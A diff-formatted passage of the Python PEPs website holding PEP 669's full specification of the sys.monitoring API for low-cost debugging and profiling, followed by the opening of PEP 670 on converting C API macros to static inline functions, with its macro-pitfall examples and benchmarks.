This PEP is a historical document. The up-to-date, canonical documentation can now be found at sys.monitoring.

+

×

+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

Using a profiler or debugger in CPython can have a severe impact on +performance. Slowdowns by an order of magnitude are common.

+

This PEP proposes an API for monitoring Python programs running +on CPython that will enable monitoring at low cost.

+

Although this PEP does not specify an implementation, it is expected that +it will be implemented using the quickening step of +PEP 659.

+

A sys.monitoring namespace will be added, which will contain +the relevant functions and constants.

+
+
+

Motivation

+

Developers should not have to pay an unreasonable cost to use debuggers, +profilers and other similar tools.

+

C++ and Java developers expect to be able to run a program at full speed +(or very close to it) under a debugger. +Python developers should expect that too.

+
+
+

Rationale

+

The quickening mechanism provided by PEP 659 provides a way to dynamically +modify executing Python bytecode. These modifications have little cost beyond +the parts of the code that are modified and a relatively low cost to those +parts that are modified. We can leverage this to provide an efficient +mechanism for monitoring that was not possible in 3.10 or earlier.

+

By using quickening, we expect that code run under a debugger on 3.12 +should outperform code run without a debugger on 3.11. +Profiling will still slow down execution, but by much less than in 3.11.

+
+
+

Specification

+

Monitoring of Python programs is done by registering callback functions +for events and by activating a set of events.

+

Activating events and registering callback functions are independent of each other.

+

Both registering callbacks and activating events are done on a per-tool basis. +It is possible to have multiple tools that respond to different sets of events.

+

Note that, unlike sys.settrace(), events and callbacks are per interpreter, not per thread.

+
+

Events

+

As a code object executes various events occur that might be of interest +to tools. By activating events and by registering callback functions +tools can respond to these events in any way that suits them. +Events can be set globally, or for individual code objects.

+

For 3.12, CPython will support the following events:

+
    +
  • PY_START: Start of a Python function (occurs immediately after the call, the callee’s frame will be on the stack)
  • +
  • PY_RESUME: Resumption of a Python function (for generator and coroutine functions), except for throw() calls.
  • +
  • PY_THROW: A Python function is resumed by a throw() call.
  • +
  • PY_RETURN: Return from a Python function (occurs immediately before the return, the callee’s frame will be on the stack).
  • +
  • PY_YIELD: Yield from a Python function (occurs immediately before the yield, the callee’s frame will be on the stack).
  • +
  • PY_UNWIND: Exit from a Python function during exception unwinding.
  • +
  • CALL: A call in Python code (event occurs before the call).
  • +
  • C_RETURN: Return from any callable, except Python functions (event occurs after the return).
  • +
  • C_RAISE: Exception raised from any callable, except Python functions (event occurs after the exit).
  • +
  • RAISE: An exception is raised, except those that cause a STOP_ITERATION event.
  • +
  • EXCEPTION_HANDLED: An exception is handled.
  • +
  • LINE: An instruction is about to be executed that has a different line number from the preceding instruction.
  • +
  • INSTRUCTION – A VM instruction is about to be executed.
  • +
  • JUMP – An unconditional jump in the control flow graph is made.
  • +
  • BRANCH – A conditional branch is taken (or not).
  • +
  • STOP_ITERATION – An artificial StopIteration is raised; +see the STOP_ITERATION event.
  • +
+

More events may be added in the future.

+

All events will be attributes of the events namespace in sys.monitoring. +All events will represented by a power of two integer, so that they can be combined +with the | operator.

+

Events are divided into three groups:

+
+

Local events

+

Local events are associated with normal execution of the program and happen +at clearly defined locations. All local events can be disabled. +The local events are:

+
    +
  • PY_START
  • +
  • PY_RESUME
  • +
  • PY_RETURN
  • +
  • PY_YIELD
  • +
  • CALL
  • +
  • LINE
  • +
  • INSTRUCTION
  • +
  • JUMP
  • +
  • BRANCH
  • +
  • STOP_ITERATION
  • +
+
+
+

Ancilliary events

+

Ancillary events can be monitored like other events, but are controlled +by another event:

+
    +
  • C_RAISE
  • +
  • C_RETURN
  • +
+

The C_RETURN and C_RAISE events are are controlled by the CALL +event. C_RETURN and C_RAISE events will only be seen if the +corresponding CALL event is being monitored.

+
+
+

Other events

+

Other events are not necessarily tied to a specific location in the +program and cannot be individually disabled.

+

The other events that can be monitored are:

+
    +
  • PY_THROW
  • +
  • PY_UNWIND
  • +
  • RAISE
  • +
  • EXCEPTION_HANDLED
  • +
+
+
+

The STOP_ITERATION event

+

PEP 380 +specifies that a StopIteration exception is raised when returning a value +from a generator or coroutine. However, this is a very inefficient way to +return a value, so some Python implementations, notably CPython 3.12+, do not +raise an exception unless it would be visible to other code.

+

To allow tools to monitor for real exceptions without slowing down generators +and coroutines, the STOP_ITERATION event is provided. +STOP_ITERATION can be locally disabled, unlike RAISE.

+
+
+
+

Tool identifiers

+

The VM can support up to 6 tools at once. +Before registering or activating events, a tool should choose an identifier. +Identifiers are integers in the range 0 to 5.

+
sys.monitoring.use_tool_id(id, name:str) -> None
+sys.monitoring.free_tool_id(id) -> None
+sys.monitoring.get_tool(id) ->  str | None
+
+
+

sys.monitoring.use_tool_id raises a ValueError if id is in use. +sys.monitoring.get_tool returns the name of the tool if id is in use, +otherwise it returns None.

+

All IDs are treated the same by the VM with regard to events, but the +following IDs are pre-defined to make co-operation of tools easier:

+
sys.monitoring.DEBUGGER_ID = 0
+sys.monitoring.COVERAGE_ID = 1
+sys.monitoring.PROFILER_ID = 2
+sys.monitoring.OPTIMIZER_ID = 5
+
+
+

There is no obligation to set an ID, nor is there anything preventing a tool +from using an ID even it is already in use. +However, tools are encouraged to use a unique ID and respect other tools.

+

For example, if a debugger were attached and DEBUGGER_ID were in use, it +should report an error, rather than carrying on regardless.

+

The OPTIMIZER_ID is provided for tools like Cinder or PyTorch +that want to optimize Python code, but need to decide what to +optimize in a way that depends on some wider context.

+
+
+

Setting events globally

+

Events can be controlled globally by modifying the set of events being monitored:

+
    +
  • sys.monitoring.get_events(tool_id:int)->int +Returns the int representing all the active events.
  • +
  • sys.monitoring.set_events(tool_id:int, event_set: int) +Activates all events which are set in event_set. +Raises a ValueError if tool_id is not in use.
  • +
+

No events are active by default.

+
+
+

Per code object events

+

Events can also be controlled on a per code object basis:

+
    +
  • sys.monitoring.get_local_events(tool_id:int, code: CodeType)->int +Returns all the local events for code
  • +
  • sys.monitoring.set_local_events(tool_id:int, code: CodeType, event_set: int) +Activates all the local events for code which are set in event_set. +Raises a ValueError if tool_id is not in use.
  • +
+

Local events add to global events, but do not mask them. +In other words, all global events will trigger for a code object, +regardless of the local events.

+
+
+

Register callback functions

+

To register a callable for events call:

+
sys.monitoring.register_callback(tool_id:int, event: int, func: Callable | None) -> Callable | None
+
+
+

If another callback was registered for the given tool_id and event, +it is unregistered and returned. +Otherwise register_callback returns None.

+

Functions can be unregistered by calling +sys.monitoring.register_callback(tool_id, event, None).

+

Callback functions can be registered and unregistered at any time.

+

Registering or unregistering a callback function will generate a sys.audit event.

+
+

Callback function arguments

+

When an active event occurs, the registered callback function is called. +Different events will provide the callback function with different arguments, as follows:

+
    +
  • PY_START and PY_RESUME:
    func(code: CodeType, instruction_offset: int) -> DISABLE | Any
    +
    +
    +
  • +
  • PY_RETURN and PY_YIELD:
    +
    func(code: CodeType, instruction_offset: int, retval: object) -> DISABLE | Any
    +
  • +
  • CALL, C_RAISE and C_RETURN:
    +
    func(code: CodeType, instruction_offset: int, callable: object, arg0: object | MISSING) -> DISABLE | Any

    If there are no arguments, arg0 is set to MISSING.

    +
    +
  • +
  • RAISE and EXCEPTION_HANDLED:
    +
    func(code: CodeType, instruction_offset: int, exception: BaseException) -> DISABLE | Any
    +
  • +
  • LINE:
    +
    func(code: CodeType, line_number: int) -> DISABLE | Any
    +
  • +
  • BRANCH:
    +
    func(code: CodeType, instruction_offset: int, destination_offset: int) -> DISABLE | Any
    +

    Note that the destination_offset is where the code will next execute. +For an untaken branch this will be the offset of the instruction following +the branch.

    +
  • +
  • INSTRUCTION:
    +
    func(code: CodeType, instruction_offset: int) -> DISABLE | Any
    +
  • +
+

If a callback function returns DISABLE, then that function will no longer +be called for that (code, instruction_offset) until +sys.monitoring.restart_events() is called. +This feature is provided for coverage and other tools that are only interested +seeing an event once.

+

Note that sys.monitoring.restart_events() is not specific to one tool, +so tools must be prepared to receive events that they have chosen to DISABLE.

+
+
+
+

Events in callback functions

+

Events are suspended in callback functions and their callees for the tool +that registered that callback.

+

That means that other tools will see events in the callback functions for other +tools. This could be useful for debugging a profiling tool, but would produce +misleading profiles, as the debugger tool would show up in the profile.

+
+
+

Order of events

+

If an instructions triggers several events they occur in the following order:

+
    +
  • LINE
  • +
  • INSTRUCTION
  • +
  • All other events (only one of these events can occur per instruction)
  • +
+

Each event is delivered to tools in ascending order of ID.

+
+
+

The “call” event group

+

Most events are independent; setting or disabling one event has no effect on the others. +However, the CALL, C_RAISE and C_RETURN events form a group. +If any of those events are set or disabled, then all events in the group are. +Disabling a CALL event will not disable the matching C_RAISE or C_RETURN, +but will disable all subsequent events.

+
+
+

Attributes of the sys.monitoring namespace

+
    +
  • def use_tool_id(id)->None
  • +
  • def free_tool_id(id)->None
  • +
  • def get_events(tool_id: int)->int
  • +
  • def set_events(tool_id: int, event_set: int)->None
  • +
  • def get_local_events(tool_id: int, code: CodeType)->int
  • +
  • def set_local_events(tool_id: int, code: CodeType, event_set: int)->None
  • +
  • def register_callback(tool_id: int, event: int, func: Callable)->Optional[Callable]
  • +
  • def restart_events()->None
  • +
  • DISABLE: object
  • +
  • MISSING: object
  • +
+
+
+

Access to “debug only” features

+

Some features of the standard library are not accessible to normal code, +but are accessible to debuggers. For example, setting local variables, or +the line number.

+

These features will be available to callback functions.

+
+
+
+

Backwards Compatibility

+

This PEP is mostly backwards compatible.

+

There are some compatibility issues with PEP 523, as the behavior +of PEP 523 plugins is outside of the VM’s control. +It is up to PEP 523 plugins to ensure that they respect the semantics +of this PEP. Simple plugins that do not change the state of the VM, and +defer execution to _PyEval_EvalFrameDefault() should continue to work.

+

sys.settrace() and sys.setprofile() will act as if they were tools +6 and 7 respectively, so can be used alongside this PEP.

+

This means that sys.settrace() and sys.setprofile() may not work +correctly with all PEP 523 plugins. Although, simple PEP 523 +plugins, as described above, should be fine.

+
+

Performance

+

If no events are active, this PEP should have a small positive impact on +performance. Experiments show between 1 and 2% speedup from not supporting +sys.settrace() directly.

+

The performance of sys.settrace() will be about the same. +The performance of sys.setprofile() should be better. +However, tools relying on sys.settrace() and +sys.setprofile() can be made a lot faster by using the +API provided by this PEP.

+

If a small set of events are active, e.g. for a debugger, then the overhead +of callbacks will be orders of magnitudes less than for sys.settrace() +and much cheaper than using PEP 523.

+

Coverage tools can be implemented at very low cost, +by returning DISABLE in all callbacks.

+

For heavily instrumented code, e.g. using LINE, performance should be +better than sys.settrace, but not by that much as performance will be +dominated by the time spent in callbacks.

+

For optimizing virtual machines, such as future versions of CPython +(and PyPy should they choose to support this API), changes to the set +active events in the midst of a long running program could be quite +expensive, possibly taking hundreds of milliseconds as it triggers +de-optimizations. Once such de-optimization has occurred, performance should +recover as the VM can re-optimize the instrumented code.

+

In general these operations can be considered to be fast:

+
    +
  • def get_events(tool_id: int)->int
  • +
  • def get_local_events(tool_id: int, code: CodeType)->int
  • +
  • def register_callback(tool_id: int, event: int, func: Callable)->Optional[Callable]
  • +
  • def get_tool(tool_id) -> str | None
  • +
+

These operations are slower, but not especially so:

+
    +
  • def set_local_events(tool_id: int, code: CodeType, event_set: int)->None
  • +
+

And these operations should be regarded as slow:

+
    +
  • def use_tool_id(id, name:str)->None
  • +
  • def free_tool_id(id)->None
  • +
  • def set_events(tool_id: int, event_set: int)->None
  • +
  • def restart_events()->None
  • +
+

How slow the slow operations are depends on when they happen. +If done early in the program, before modules are loaded, +they should be fairly inexpensive.

+
+

Memory Consumption

+

When not in use, this PEP will have a negligible change on memory consumption.

+

How memory is used is very much an implementation detail. +However, we expect that for 3.12 the additional memory consumption per +code object will be roughly as follows:

+ + + + + + + + + + + + + + + + + + + + + + + + +
Events
ToolsOthersLINEINSTRUCTION
OneNone≈40%≈80%
Two or more≈40%≈120%≈200%
+
+
+
+
+

Security Implications

+

Allowing modification of running code has some security implications, +but no more than the ability to generate and call new code.

+

All the new functions listed above will trigger audit hooks.

+
+
+

Implementation

+

This outlines the proposed implementation for CPython 3.12. The actual +implementation for later versions of CPython and other Python implementations +may differ considerably.

+

The proposed implementation of this PEP will be built on top of the quickening +step of CPython 3.11, as described in PEP 659. +Instrumentation works in much the same way as quickening, bytecodes are +replaced with instrumented ones as needed.

+

For example, if the CALL event is turned on, +then all call instructions will be +replaced with a INSTRUMENTED_CALL instruction.

+

Note that this will interfere with specialization, which will result in some +performance degradation in addition to the overhead of calling the +registered callable.

+

When the set of active events changes, the VM will immediately update +all code objects present on the call stack of any thread. It will also set in +place traps to ensure that all code objects are correctly instrumented when +called. Consequently changing the set of active events should be done as +infrequently as possible, as it could be quite an expensive operation.

+

Other events, such as RAISE can be turned on or off cheaply, +as they do not rely on code instrumentation, but runtime checks when the +underlying event occurs.

+

The exact set of events that require instrumentation is an implementation detail, +but for the current design, the following events will require instrumentation:

+
    +
  • PY_START
  • +
  • PY_RESUME
  • +
  • PY_RETURN
  • +
  • PY_YIELD
  • +
  • CALL
  • +
  • LINE
  • +
  • INSTRUCTION
  • +
  • JUMP
  • +
  • BRANCH
  • +
+

Each instrumented bytecode will require an additional 8 bits of information to +note which tool the instrumentation applies to. +LINE and INSTRUCTION events require additional information, as they +need to store the original instruction, or even the instrumented instruction +if they overlap other instrumentation.

+
+
+

Implementing tools

+

It is the philosophy of this PEP that it should be possible for third-party monitoring +tools to achieve high-performance, not that it should be easy for them to do so.

+

Converting events into data that is meaningful to the users is +the responsibility of the tool.

+

All events have a cost, and tools should attempt to the use set of events +that trigger the least often and still provide the necessary information.

+
+

Debuggers

+
+

Inserting breakpoints

+

Breakpoints can be inserted setting per code object events, either LINE or INSTRUCTION, +and returning DISABLE for any events not matching a breakpoint.

+
+
+

Stepping

+

Debuggers usually offer the ability to step execution by a +single instruction or line.

+

Like breakpoints, stepping can be implemented by setting per code object events. +As soon as normal execution is to be resumed, the local events can be unset.

+
+
+

Attaching

+

Debuggers can use the PY_START and PY_RESUME events to be informed +when a code object is first encountered, so that any necessary breakpoints +can be inserted.

+
+
+
+

Coverage Tools

+

Coverage tools need to track which parts of the control graph have been +executed. To do this, they need to register for the PY_ events, +plus JUMP and BRANCH.

+

This information can be then be converted back into a line based report +after execution has completed.

+
+
+

Profilers

+

Simple profilers need to gather information about calls. +To do this profilers should register for the following events:

+
    +
  • PY_START
  • +
  • PY_RESUME
  • +
  • PY_THROW
  • +
  • PY_RETURN
  • +
  • PY_YIELD
  • +
  • PY_UNWIND
  • +
  • CALL
  • +
  • C_RAISE
  • +
  • C_RETURN
  • +
+
+

Line based profilers

+

Line based profilers can use the LINE and JUMP events. +Implementers of profilers should be aware that instrumenting LINE +events will have a large impact on performance.

+
+

Note

+

Instrumenting profilers have significant overhead and will distort +the results of profiling. Unless you need exact call counts, +consider using a statistical profiler.

+
+
+
+
+
+

Rejected ideas

+

A draft version of this PEP proposed making the user responsible +for inserting the monitoring instructions, rather than have VM do it. +However, that puts too much of a burden on the tools, and would make +attaching a debugger nearly impossible.

+

An earlier version of this PEP, proposed storing events as enums:

+
class Event(enum.IntFlag):
+    PY_START = ...
+
+
+

However, that would prevent monitoring of code before the enum module was +loaded and could cause unnecessary overhead.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0669.rst

+

Last modified: 2024-02-07 11:51:52 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0670/index.html b/pep-0670/index.html new file mode 100644 index 00000000000..6dc8280ae67 --- /dev/null +++ b/pep-0670/index.html @@ -0,0 +1,768 @@ + + + + + + + + PEP 670 – Convert macros to functions in the Python C API | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 670 – Convert macros to functions in the Python C API

+
+
Author:
+
Erlend Egeberg Aasland <erlend at python.org>, +Victor Stinner <vstinner at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
19-Oct-2021
+
Python-Version:
+
3.11
+
Post-History:
+
20-Oct-2021, +08-Feb-2022, +22-Feb-2022
+
Resolution:
+
Python-Dev thread
+
+
+
+
Table of Contents +
+
+

Abstract

+

Macros in the C API will be converted to static inline functions or +regular functions. This will help avoid macro pitfalls in C/C++, and +make the functions usable from other programming languages.

+

To avoid compiler warnings, function arguments of pointer types +will be cast to appropriate types using additional macros. +The cast will not be done in the limited C API version 3.11: +users who opt in to the new limited API may need to add casts to +the exact expected type.

+

To avoid introducing incompatible changes, macros which can be used as +l-value in an assignment will not be converted.

+
+
+

Rationale

+

The use of macros may have unintended adverse effects that are hard to +avoid, even for experienced C developers. Some issues have been known +for years, while others have been discovered recently in Python. +Working around macro pitfalls makes the macro code harder to read and +to maintain.

+

Converting macros to functions has multiple advantages:

+
    +
  • Functions don’t suffer from macro pitfalls, for example the following +ones described in GCC documentation:
      +
    • Misnesting
    • +
    • Operator precedence problems
    • +
    • Swallowing the semicolon
    • +
    • Duplication of side effects
    • +
    • Self-referential macros
    • +
    • Argument prescan
    • +
    • Newlines in arguments
    • +
    +

    Functions don’t need the following workarounds for macro +pitfalls, making them usually easier to read and to maintain than +similar macro code:

    +
      +
    • Adding parentheses around arguments.
    • +
    • Using line continuation characters if the function is written on +multiple lines.
    • +
    • Adding commas to execute multiple expressions.
    • +
    • Using do { ... } while (0) to write multiple statements.
    • +
    +
  • +
  • Argument types and the return type of functions are well defined.
  • +
  • Debuggers and profilers can retrieve the name of inlined functions.
  • +
  • Debuggers can put breakpoints on inlined functions.
  • +
  • Variables have a well-defined scope.
  • +
+

Converting macros and static inline functions to regular functions makes +these regular functions accessible to projects which use Python but +cannot use macros and static inline functions.

+
+
+

Specification

+
+

Convert macros to static inline functions

+

Most macros will be converted to static inline functions.

+

The following macros will not be converted:

+
    +
  • Object-like macros (i.e. those which don’t need parentheses and +arguments). For example:
      +
    • Empty macros. Example: #define Py_HAVE_CONDVAR.
    • +
    • Macros only defining a value, even if a constant with a well defined +type would be better. Example: #define METH_VARARGS 0x0001.
    • +
    +
  • +
  • Compatibility layer for different C compilers, C language extensions, +or recent C features. +Example: Py_GCC_ATTRIBUTE(), Py_ALWAYS_INLINE, Py_MEMCPY().
  • +
  • Macros used for definitions rather than behavior. +Example: PyAPI_FUNC, Py_DEPRECATED, Py_PYTHON_H.
  • +
  • Macros that need C preprocessor features, like stringification and +concatenation. Example: Py_STRINGIFY().
  • +
  • Macros which cannot be converted to functions. Examples: +Py_BEGIN_ALLOW_THREADS (contains an unpaired }), Py_VISIT +(relies on specific variable names), Py_RETURN_RICHCOMPARE (returns +from the calling function).
  • +
  • Macros which can be used as an l-value in assignments. This would be +an incompatible change and is out of the scope of this PEP. +Example: PyBytes_AS_STRING().
  • +
  • Macros which have different return types depending on the code path +or arguments.
  • +
+
+
+

Convert static inline functions to regular functions

+

Static inline functions in the public C API may be converted to regular +functions, but only if there is no measurable performance impact of +changing the function. +The performance impact should be measured with benchmarks.

+
+
+

Cast pointer arguments

+

Currently, most macros accepting pointers cast pointer arguments to +their expected types. For example, in Python 3.6, the Py_TYPE() +macro casts its argument to PyObject*:

+
#define Py_TYPE(ob) (((PyObject*)(ob))->ob_type)
+
+
+

The Py_TYPE() macro accepts the PyObject* type, but also any +pointer types, such as PyLongObject* and PyDictObject*.

+

Functions are strongly typed, and can only accept one type of argument.

+

To avoid compiler errors and warnings in existing code, when a macro is +converted to a function and the macro casts at least one of its arguments +a new macro will be added to keep the cast. The new macro +and the function will have the same name.

+

Example with the Py_TYPE() +macro converted to a static inline function:

+
static inline PyTypeObject* Py_TYPE(PyObject *ob) {
+    return ob->ob_type;
+}
+#define Py_TYPE(ob) Py_TYPE((PyObject*)(ob))
+
+
+

The cast is kept for all pointer types, not only PyObject*. +This includes casts to void*: removing a cast to void* would emit +a new warning if the function is called with a const void* variable. +For example, the PyUnicode_WRITE() macro casts its data argument to +void*, and so it currently accepts const void* type, even though +it writes into data. This PEP will not change this.

+
+

Avoid the cast in the limited C API version 3.11

+

The casts will be excluded from the limited C API version 3.11 and newer. +When an API user opts into the new limited API, they must pass the expected +type or perform the cast.

+

As an example, Py_TYPE() will be defined like this:

+
static inline PyTypeObject* Py_TYPE(PyObject *ob) {
+    return ob->ob_type;
+}
+#if !defined(Py_LIMITED_API) || Py_LIMITED_API+0 < 0x030b0000
+#  define Py_TYPE(ob) Py_TYPE((PyObject*)(ob))
+#endif
+
+
+
+
+
+

Return type is not changed

+

When a macro is converted to a function, its return type must not change +to prevent emitting new compiler warnings.

+

For example, Python 3.7 changed the return type of PyUnicode_AsUTF8() +from char* to const char* (commit). +The change emitted new compiler warnings when building C extensions +expecting char*. This PEP doesn’t change the return type to prevent +this issue.

+
+
+
+

Backwards Compatibility

+

The PEP is designed to avoid C API incompatible changes.

+

Only C extensions explicitly targeting the limited C API version 3.11 +must now pass the expected types to functions: pointer arguments are no +longer cast to the expected types.

+

Function arguments of pointer types are still cast and return types are +not changed to prevent emitting new compiler warnings.

+

Macros which can be used as l-value in an assignment are not modified by +this PEP to avoid incompatible changes.

+
+
+

Examples of Macro Pitfalls

+
+

Duplication of side effects

+

Macros:

+
#define PySet_Check(ob) \
+    (Py_IS_TYPE(ob, &PySet_Type) \
+     || PyType_IsSubtype(Py_TYPE(ob), &PySet_Type))
+
+#define Py_IS_NAN(X) ((X) != (X))
+
+
+

If the op or the X argument has a side effect, the side effect is +duplicated: it executed twice by PySet_Check() and Py_IS_NAN().

+

For example, the pos++ argument in the +PyUnicode_WRITE(kind, data, pos++, ch) code has a side effect. +This code is safe because the PyUnicode_WRITE() macro only uses its +3rd argument once and so does not duplicate pos++ side effect.

+
+
+

Misnesting

+

Example of the bpo-43181: Python macros don’t shield arguments. The PyObject_TypeCheck() +macro before it has been fixed:

+
#define PyObject_TypeCheck(ob, tp) \
+    (Py_IS_TYPE(ob, tp) || PyType_IsSubtype(Py_TYPE(ob), (tp)))
+
+
+

C++ usage example:

+
PyObject_TypeCheck(ob, U(f<a,b>(c)))
+
+
+

The preprocessor first expands it:

+
(Py_IS_TYPE(ob, f<a,b>(c)) || ...)
+
+
+

C++ "<" and ">" characters are not treated as brackets by the +preprocessor, so the Py_IS_TYPE() macro is invoked with 3 arguments:

+
    +
  • ob
  • +
  • f<a
  • +
  • b>(c)
  • +
+

The compilation fails with an error on Py_IS_TYPE() which only takes +2 arguments.

+

The bug is that the op and tp arguments of PyObject_TypeCheck() +must be put between parentheses: replace Py_IS_TYPE(ob, tp) with +Py_IS_TYPE((ob), (tp)). In regular C code, these parentheses are +redundant, can be seen as a bug, and so are often forgotten when writing +macros.

+

To avoid Macro Pitfalls, the PyObject_TypeCheck() macro has been +converted to a static inline function: +commit.

+
+
+
+

Examples of hard to read macros

+
+

PyObject_INIT()

+

Example showing the usage of commas in a macro which has a return value.

+

Python 3.7 macro:

+
#define PyObject_INIT(op, typeobj) \
+    ( Py_TYPE(op) = (typeobj), _Py_NewReference((PyObject *)(op)), (op) )
+
+
+

Python 3.8 function (simplified code):

+
static inline PyObject*
+_PyObject_INIT(PyObject *op, PyTypeObject *typeobj)
+{
+    Py_TYPE(op) = typeobj;
+    _Py_NewReference(op);
+    return op;
+}
+
+#define PyObject_INIT(op, typeobj) \
+    _PyObject_INIT(_PyObject_CAST(op), (typeobj))
+
+
+
    +
  • The function doesn’t need the line continuation character "\".
  • +
  • It has an explicit "return op;" rather than the surprising +", (op)" syntax at the end of the macro.
  • +
  • It uses short statements on multiple lines, rather than being written +as a single long line.
  • +
  • Inside the function, the op argument has the well defined type +PyObject* and so doesn’t need casts like (PyObject *)(op).
  • +
  • Arguments don’t need to be put inside parentheses: use typeobj, +rather than (typeobj).
  • +
+
+
+

_Py_NewReference()

+

Example showing the usage of an #ifdef inside a macro.

+

Python 3.7 macro (simplified code):

+
#ifdef COUNT_ALLOCS
+#  define _Py_INC_TPALLOCS(OP) inc_count(Py_TYPE(OP))
+#  define _Py_COUNT_ALLOCS_COMMA  ,
+#else
+#  define _Py_INC_TPALLOCS(OP)
+#  define _Py_COUNT_ALLOCS_COMMA
+#endif /* COUNT_ALLOCS */
+
+#define _Py_NewReference(op) (                   \
+    _Py_INC_TPALLOCS(op) _Py_COUNT_ALLOCS_COMMA  \
+    Py_REFCNT(op) = 1)
+
+
+

Python 3.8 function (simplified code):

+
static inline void _Py_NewReference(PyObject *op)
+{
+    _Py_INC_TPALLOCS(op);
+    Py_REFCNT(op) = 1;
+}
+
+
+
+
+

PyUnicode_READ_CHAR()

+

This macro reuses arguments, and possibly calls PyUnicode_KIND multiple +times:

+
#define PyUnicode_READ_CHAR(unicode, index) \
+(assert(PyUnicode_Check(unicode)),          \
+ assert(PyUnicode_IS_READY(unicode)),       \
+ (Py_UCS4)                                  \
+    (PyUnicode_KIND((unicode)) == PyUnicode_1BYTE_KIND ? \
+        ((const Py_UCS1 *)(PyUnicode_DATA((unicode))))[(index)] : \
+        (PyUnicode_KIND((unicode)) == PyUnicode_2BYTE_KIND ? \
+            ((const Py_UCS2 *)(PyUnicode_DATA((unicode))))[(index)] : \
+            ((const Py_UCS4 *)(PyUnicode_DATA((unicode))))[(index)] \
+        ) \
+    ))
+
+
+

Possible implementation as a static inlined function:

+
static inline Py_UCS4
+PyUnicode_READ_CHAR(PyObject *unicode, Py_ssize_t index)
+{
+    assert(PyUnicode_Check(unicode));
+    assert(PyUnicode_IS_READY(unicode));
+
+    switch (PyUnicode_KIND(unicode)) {
+    case PyUnicode_1BYTE_KIND:
+        return (Py_UCS4)((const Py_UCS1 *)(PyUnicode_DATA(unicode)))[index];
+    case PyUnicode_2BYTE_KIND:
+        return (Py_UCS4)((const Py_UCS2 *)(PyUnicode_DATA(unicode)))[index];
+    case PyUnicode_4BYTE_KIND:
+    default:
+        return (Py_UCS4)((const Py_UCS4 *)(PyUnicode_DATA(unicode)))[index];
+    }
+}
+
+
+
+
+
+

Macros converted to functions since Python 3.8

+

This is a list of macros already converted to functions between +Python 3.8 and Python 3.11. +Even though some converted macros (like Py_INCREF()) are very +commonly used by C extensions, these conversions did not significantly +impact Python performance and most of them didn’t break backward +compatibility.

+
+

Macros converted to static inline functions

+

Python 3.8:

+
    +
  • Py_DECREF()
  • +
  • Py_INCREF()
  • +
  • Py_XDECREF()
  • +
  • Py_XINCREF()
  • +
  • PyObject_INIT()
  • +
  • PyObject_INIT_VAR()
  • +
  • _PyObject_GC_UNTRACK()
  • +
  • _Py_Dealloc()
  • +
+
+
+

Macros converted to regular functions

+

Python 3.9:

+
    +
  • PyIndex_Check()
  • +
  • PyObject_CheckBuffer()
  • +
  • PyObject_GET_WEAKREFS_LISTPTR()
  • +
  • PyObject_IS_GC()
  • +
  • PyObject_NEW(): alias to PyObject_New()
  • +
  • PyObject_NEW_VAR(): alias to PyObjectVar_New()
  • +
+

To avoid performance slowdown on Python built without LTO, +private static inline functions have been added to the internal C API:

+
    +
  • _PyIndex_Check()
  • +
  • _PyObject_IS_GC()
  • +
  • _PyType_HasFeature()
  • +
  • _PyType_IS_GC()
  • +
+
+
+

Static inline functions converted to regular functions

+

Python 3.11:

+
    +
  • PyObject_CallOneArg()
  • +
  • PyObject_Vectorcall()
  • +
  • PyVectorcall_Function()
  • +
  • _PyObject_FastCall()
  • +
+

To avoid performance slowdown on Python built without LTO, a +private static inline function has been added to the internal C API:

+
    +
  • _PyVectorcall_FunctionInline()
  • +
+
+
+

Incompatible changes

+

While other converted macros didn’t break the backward compatibility, +there is an exception.

+

The 3 macros Py_REFCNT(), Py_TYPE() and Py_SIZE() have been +converted to static inline functions in Python 3.10 and 3.11 to disallow +using them as l-value in assignment. It is an incompatible change made +on purpose: see bpo-39573 for +the rationale.

+

This PEP does not propose converting macros which can be used as l-value +to avoid introducing new incompatible changes.

+
+
+
+

Performance concerns and benchmarks

+

There have been concerns that converting macros to functions can degrade +performance.

+

This section explains performance concerns and shows benchmark results +using PR 29728, which +replaces the following static inline functions with macros:

+
    +
  • PyObject_TypeCheck()
  • +
  • PyType_Check(), PyType_CheckExact()
  • +
  • PyType_HasFeature()
  • +
  • PyVectorcall_NARGS()
  • +
  • Py_DECREF(), Py_XDECREF()
  • +
  • Py_INCREF(), Py_XINCREF()
  • +
  • Py_IS_TYPE()
  • +
  • Py_NewRef()
  • +
  • Py_REFCNT(), Py_TYPE(), Py_SIZE()
  • +
+

The benchmarks were run on Fedora 35 (Linux) with GCC 11 on a laptop with 8 +logical CPUs (4 physical CPU cores).

+
+

Static inline functions

+

First of all, converting macros to static inline functions has +negligible impact on performance: the measured differences are consistent +with noise due to unrelated factors.

+

Static inline functions are a new feature in the C99 standard. Modern C +compilers have efficient heuristics to decide if a function should be +inlined or not.

+

When a C compiler decides to not inline, there is likely a good reason. +For example, inlining would reuse a register which requires to +save/restore the register value on the stack and so increases the stack +memory usage, or be less efficient.

+

Benchmark of the ./python -m test -j5 command on Python built in +release mode with gcc -O3, LTO and PGO:

+
    +
  • Macros (PR 29728): 361 sec +- 1 sec
  • +
  • Static inline functions (reference): 361 sec +- 1 sec
  • +
+

There is no significant performance difference between macros and +static inline functions when static inline functions are inlined.

+
+
+

Debug build

+

Performance in debug builds can suffer when macros are converted to +functions. This is compensated by better debuggability: debuggers can +retrieve function names, set breakpoints inside functions, etc.

+

On Windows, when Python is built in debug mode by Visual Studio, static +inline functions are not inlined.

+

On other platforms, ./configure --with-pydebug uses the -Og compiler +option on compilers that support it (including GCC and LLVM Clang). +-Og means “optimize debugging experience”. +Otherwise, the -O0 compiler option is used. +-O0 means “disable most optimizations”.

+

With GCC 11, gcc -Og can inline static inline functions, whereas +gcc -O0 does not inline static inline functions.

+

Benchmark of the ./python -m test -j10 command on Python built in +debug mode with gcc -O0 (that is, compiler optimizations, +including inlining, are explicitly disabled):

+
    +
  • Macros (PR 29728): 345 sec ± 5 sec
  • +
  • Static inline functions (reference): 360 sec ± 6 sec
  • +
+

Replacing macros with static inline functions makes Python +1.04x slower when the compiler does not inline static inline +functions.

+

